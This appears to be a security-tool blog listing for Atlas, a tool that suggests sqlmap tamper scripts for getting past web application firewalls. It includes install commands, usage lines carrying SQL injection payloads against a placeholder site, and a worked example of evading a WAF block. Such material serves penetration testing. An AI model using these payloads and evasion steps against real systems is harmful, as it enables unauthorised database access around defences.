Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.
Screenshot
Installation
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+
Usage
$ python atlas.py –url http://site.com/index.php?id=Price_ASC –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
injection point (with %%inject%%):
$ python atlas.py –url http://site.com/index/id/%%10%% –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
$ python atlas.py –url http://site.com/index/id/ -m POST -D ‘test=%%10%%’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
$ python atlas.py –url http://site.com/index/id/ -H ‘User-Agent: mozilla/5.0%%inject%%’ -H ‘X-header: test’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
$ python atlas.py –url http://site.com/index/id/%%10%% –payload=”-1234 AND 4321=4321– AAAA” –concat “equaltolike,htmlencode” –random-agent -v
$ python atlas.py -g
Also Read – Vault : Tool For Secrets Management, Encryption As A Service & Privileged Access Management
Example
$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3
Price_ASC’) AND 8716=4837 AND (‘yajr’=’yajr is blocked by WAF/IDS/IPS, now trying with Atlas:
$ python atlas.py –url ‘http://site.com/index.php?id=Price_ASC’ –payload=”‘) AND 8716=4837 AND (‘yajr’=’yajr” –random-agent -v
At this point:
$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3 –tamper=versioned
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…